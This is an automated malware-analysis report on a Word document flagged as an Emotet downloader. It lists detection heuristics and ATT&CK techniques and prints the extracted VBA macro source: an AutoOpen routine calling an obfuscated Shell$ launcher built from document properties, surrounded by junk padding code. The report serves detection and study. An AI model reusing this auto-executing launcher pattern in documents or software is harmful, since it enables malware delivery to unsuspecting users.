Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it is a downloader for the Emotet family. Heuristics confirm the presence of VBA macros, including an AutoOpen macro, and a critical finding of a Shell() call within the VBA code. In the extracted source, autoopen() calls NGHbyag(), which assembles the Shell$ command string from concatenated variables and the document's CustomDocumentProperties and Comments properties. This strongly suggests the macro is designed to execute external commands, likely PowerShell, to fetch and run a subsequent stage.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-6344335-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  On Error Resume Next VBA.Shell$ "" + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.CustomDocumentProperties("VkrLdXBax") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.BuiltInDocumentProperties("Comments") + zUZyTfUm + AuSvunDexZP + CDpkkYMhd … End Function
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Sub autoopen() NGHbyag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5964 bytes | acd837ed7e81ddfdcc5a6b2e95bfb080eadc591103c640ac286b3e7450fbd5c4 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub qCDDB9184()
On Error Resume Next
Set XVKY = 71
For RNvaX = wgULl To YKD
For tZT = tnwq To zTln
TKh = 244467177 + sbeBwf374 / 6397 / OVLUAO9b + 259 - TfFZKI
Next
Do While XDfTj Xor 14
ylecvr2 = (2 + Sgn(261 / Sgn(3 / ChrB(DUfAlxm - CInt(298) / YhJQf4KyR + Log(5273))) + GNxhG6k + 9) + OLzl20D - Sin(OqUd / Fix(7415 / ChrW(edF)) / zsnNT6AZ / 96) * (7799 / 969 + 1 / Int(9076 / Sqr(5) / QRtp / 23) / lQV - CInt(8)))
Loop
While lQYmiz1 < QNKQ
Mdlz52jx = (tEVv0 * Chr(2) - (bTjuEw1 / Atn(2)))
Wend
Next
End Sub
Sub AiLU32h()
On Error Resume Next
oaJMGg581 = dYgrc
Select Case klICSkr7
Case 4
MCNXD4 = ChrB(OMlC70C9 - Int(3))
Zmr = zjfr5R5K
Case 243
AwH = Rnd(sxeo)
mmHsO = CLng(Apelu9s)
Case 61
Zsdi8O = CBool(Ass * Chr(jrjjxBP3 * Hex(19986611 * Cos(4936) - AfLFs560o * Log(mgs + JpMO - 8 + Sqr(8)))))
XkKL = 259
End Select
End Sub
Sub nxwTj3(ESLc0T84)
On Error Resume Next
Nrab34d = 463216041 + ekOv8j2za
afN = 523743394 - zElx148l
End Sub
Sub Dwlyv(EamD92P41)
On Error Resume Next
For KPOI8915z = 4 To rrpo
Set wUCUgSZIx = 356
Iyhrn9 = gKe
vqaiI = 38751294 + PfAK0u
For dPimZ = 86 To 904
bOnq5R225 = xPcfHkR7q - Sin(271 - 296984522 / Vcpe37 / Rnd(EZLseK9)) * 169598484 / ChrW(7 + CBool(4257) * EGTC - CLng(343 - Rnd(ZoJhB8))) - (yJkC229 / CDbl(2 + wyCTz7rOj * 21 * CLng(142)) + (CEoAE6 + CSng(222694130)))
Next
Next
Set lBUL = gbm
End Sub
Sub autoopen()
NGHbyag
End Sub
Sub mCT(OCeOf3l)
On Error Resume Next
Select Case RaEi
Case 510
eGNl6 = LQGF
XYpWc = sFsnd
fxaWQM7AA = Int(XegBLS7)
Case 431
sat = 6529
duNy0F7f4 = LCRMPx
KEjU = 4
End Select
yeeCYFw7 = (7561 - CDbl(BIJs842) - 48014896 - Cos(dZMehTl) + ZrEwT * Int(NtpcagMz1) - (nfEl * Oct(FqFic405) - (92 + CBool(6724))))
Do While vSurk Eqv 19
Set byr = QJnaqWe6
FGQZ9qd = eOGQh
Set PCok590W = 14
aETDK = 503042951 * YQZNP6J
ZvJh7v2 = jdfKh9 * 291363821
Loop
End Sub
Sub ZREod6n8i()
On Error Resume Next
vhT = gega5J9f5
If fPFI = 19 Then
If AostN0 = HSZ Then
WkcS = 30135853
End If
For KeQs92 = 1 To jldx1AElW
UPR = (FcGH5 / Rnd(23) + (hyRh * Round(KOvO022 + CStr(396))))
Next
End If
Select Case QhUTa
Case 477215746
LjI = lqcHLIbmQ
Oht = CInt(996)
zmMR6805 = CLng(37)
Case 3235
igN = 32
fHQwsYb4 = Log(LDko6)
HGzq = Sqr(saLG - ChrB(vGnK) / RDlILR0w * Fix(89))
End Select
End Sub
Sub jxMf1hm6()
On Error Resume Next
If nXQO2K = 13 Then
nHkY471xN = (8 + CDate(70) * 425465999 - CBool(Jnj * Int(6641) / XtC / Sqr(106))) + 2759 + Int(143389103) + 3 / CDate(GVKO + 6265 + wCa / Sqr(XWuwl9P8X))
If xkFM98i1k <= Kbqs921 Then
ghODfekr = Hex(34)
End If
End If
YgyQ4 = 52344311 - 167383227
End Sub
Sub PUQq5P()
On Error Resume Next
wWCD = NPxd886M + tXNn
Set OTcQ9a35 = gWzqGC0
qBvs2N = (9636 - Sin(xhGx * CSng(sAH)) + (461691645 * CDate(943) / 2180 / CDate(FXZWn4)))
End Sub
Public Function NGHbyag()
On Error Resume Next
VBA.Shell$ "" + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.CustomDocumentProperties("VkrLdXBax") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + ActiveDocument.BuiltInDocumentProperties("Comments") + zUZyTfUm + AuSvunDexZP + CDpkkYMhdC + WmXpHYzTpBR + cSZLAfBZUm + MdEDYaYH + vhhUHEb + GVPACBpFB + dTdPmuSZZc + tcvAEdvvg + UWWrdtVH + EGvBAYCBKZ + ubGhMvhc + yVPhxETAa + SUSkDAarU, 0
End Function
Sub CJBO(KROLq)
On Error Resume Next
Set WGB = icLi32Yg8
Set zSa = 9093
End Sub
Sub PYm(wicz7B)
On Error Resume Next
While nfAoQS8 And 3845
While ILXjd = UaGdD
DkhKoJ0Q = CStr(CZlI21 / Sgn(rtCU) - 5 - Log(4004))
Wend
Do
HgE = 920 - Sqr(bwTb) * Osid0 * ChrW(VGGmw8528) * zRiB0 - CDate(yPKBi988) - OfDG7z4 / 75 / (3911 * 61)
Loop Until tvrd0 > XIyg2r
Do
qOQiQ = 37
Loop Until wEHjnC4G Eqv 13
PeKO7700 = 6
Wend
CbLC802nM = 58
End Sub
Sub coyLL4483()
On Error Resume Next
HKOf8 = CNzW2
Nxcrx03 = 931 + CSng(EZwR79) + xacir + Sgn(7) / 313142270 - FuLA470
While kHV > nVdw2jg80
Dim XWlD60BI(6750)
Do
cYOL4m = GVbN4kk / CDbl(1) * 54 * Log(Ghxaj5c) * 59 + Hex(277548149) / (338756838 * CLng(pOLB7b) * 74 / CDbl(AAyv))
Loop Until zOA < guKY35AP
For Each APAUYL In gnxyf3p7
TAp = 31
Next
tfOdIucY3 = PwLz + hJlPS9e
OeZs8 = WvhKP2 - qcXKn1T
Wend
End Sub
Sub odJJadX4()
On Error Resume Next
While aCbM0 Or 263350428
Do
bIw = (PcxS + Sin(41) - zyaTP4Y2 / Cos(FZJGT2H4O - Log(19) * BrOIwQ + zOSd) + 25 / CByte(tfoS5) * 238281049 + ChrW(355980611)) + (3 * 330721017 - ueUljiQ - 9)
Loop Until sXyiz >= tfJ
Do
oqYn1Z7 = (9948 * CByte(35 * CBool(bphOp0pM)))
Loop Until wKf >= 15
Wend
oJv = JZAT7welP + Fix(neq - 25 - 18 / Tan(RuWy0v)) + 5955 + CByte(zFXl) - ihXR0 * Int(nqFK9wp3 * Hex(fPzM80B) - 9834 / Chr(qWPbsT0P7))
End Sub